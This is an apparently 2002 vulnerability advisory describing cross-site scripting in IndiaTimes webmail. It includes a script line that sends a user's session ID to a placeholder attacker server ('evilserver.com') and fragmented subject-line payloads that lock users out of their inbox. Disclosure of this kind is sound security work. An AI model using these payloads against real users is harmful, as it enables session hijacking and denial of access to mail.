IndiaTimes.com - Email - Session hijacking and Inbox Blocking

[Giri Sandeep <sggosuch () isc iitr ernet in>]

IndiaTimes.com - Email - Session hijacking and Inbox Blocking

-------------------------------------------------------------------
Name      : IndiaTimes.com - Email - Session hijacking and Inbox Blocking
WebSite   : http://email.indiatimes.com
Date      : April 26, 2002
Vuln Type : Cross site scripting
Severity  : Moderate
Vendor    : Unknown

HomePage  : www.indiatimes.com
-------------------------------------------------------------------

DISCUSSION:
-------------------------------------------------------------------
Email.indiatimes.com is a very popular Web-Email facility provided by
www.indiatimes.com, online version of newspaper 'The Times Of
India'.
The script allows user to embed HTML and also javascript in the mail.
So, it is possible to insert evil code in the mail.
Although the script doesn't use cookies but still it is possible to hijack
a user's session by sending him a mail, even if the he doesn't read the
mail.

Let me convert the whole Discussion in Dialog Form:

Q: How can a session be hijacked? The site doesn't use cookies.
A: Well, The site doesn't use cookies but the session ID/Key is contained
in
<Form name=Rform ...>
 <input type=hidden name=SID value="some_random_number:>
</form>.
This SID is the only token required to authenticate user.
So, evil may pass this to a script installed at some server, from where he
can misuse it.
Example:
<script>   
self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
</script>

Q: The user may choose not to read the evil's mail.Then?
A: After clicking 'inbox' whole list of mails appears showing the
subject and sender's address of each mail. The <SCRIPT> embedded by the
sender in the 'Subject' is executed as soon as user tries to open the
inbox.
This makes the user even more vulnerable to attack.

Q: Hey, wait a minute. Only 30 characters of a 'Subject' are
displayed. So, if one tries to insert script in the 'Subject' he can only
write a code of 13 characters(30-strlen('<SCRIPT></SCRIPT>'). It is
impossible to write a code of 13 characters to exploit the above vuln.

A: Well, it is possible. Let me show you.
One may fragment the code into smaller parts and send the fragments in
subjects of separate mails ,continuously in the following way:

*/</script>
*/history.go(-1)/*
<script>*/

This will not allow the user to open his inbox.
Now, see the beauty of comments and the reverse order or lines.
The comment will help joining of the code and since the most recent mesg
is on the top, the order reverses.

Q: The user may disable JavaScript in the browser's setting.
A: Then, your whole site stops working.


IMPACT:
---------------------------------------------------------------------
Because of high number of users of Email.indiatimes.com, this
vulnerability poses a great risk.

SOLUTION:
--------------------------------------------------------------------- 
The vendor was notified but there is no response so far.

The users may choose to view the Lynx version of Email.indiatimes.com.


DISCLAIMER:
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.


FEEDBACK:
---------------------------------------------------------------------
In case of any queries, please don't hesitate in dropping me a mail. 



Thanks,

*************************|<<---/\--->>|***********************************
Sandeep Giri                  |
System Administrator(Intranet)| For finding anything your need two things:
Indian Institute of Technology|       1. Will 
Roorkee-247667                |       2. Google 
India                         |         
*************************|<<---\/--->>|***********************************